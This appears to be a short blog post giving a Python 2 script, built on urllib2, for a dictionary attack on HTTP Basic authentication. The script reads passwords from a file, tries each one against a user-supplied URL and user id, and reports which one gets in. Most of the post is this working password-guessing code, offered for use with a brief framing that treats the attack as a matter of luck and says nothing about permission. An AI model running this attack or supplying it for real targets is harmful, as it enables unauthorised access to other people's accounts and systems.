Dictionary attack on basic authentication

Dictionary attack on Basic authentication in Python

Basic authentication does not require a separate GUI-like operation, so In urllib2, there is a class that normally performs Basic authentication. Basic authentication can be a brute force attack or a dictionary attack as long as you know the id. It's a very brute force technique, but if you're lucky or lucky you can find the password.

python


import urllib2, sys, time

class Attack:
	def __init__(self, url, userid, dictionary_file):
		self.url = url
		self.userid = userid
		self.password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
		self.dictionary_file = dictionary_file

	def main(self):
		with open(self.dictionary_file, "r") as f:
			print "[INFO]: Loading..."
			lines = f.readlines()
			for password in lines:
				try:
					self.password_mgr.add_password(None, url, self.userid, password)
					handler = urllib2.HTTPBasicAuthHandler(self.password_mgr)
					opener = urllib2.build_opener(handler)
					urllib2.install_opener(opener)
					html = urllib2.urlopen(url)
					print "[yes]: password=%s" % (password)
					break
				except Exception, e:
					print "[no]: password=%s" % (password)

if __name__ == "__main__":
	url = raw_input("Url >>> ")
	userid = raw_input("Userid >>> ")
	dictionary_file = raw_input("Dictionary file >>> ")
	Attack_ = Attack(url, userid, dictionary_file)
	Attack_.main()

Recommended Posts

Dictionary attack on basic authentication
Flask Basic authentication
Python Basic Course (7 Dictionary)
python basic on windows ②
Notes on Python and dictionary types
Basic authentication and Digest authentication with Flask
Basic grammar of Python3 system (dictionary)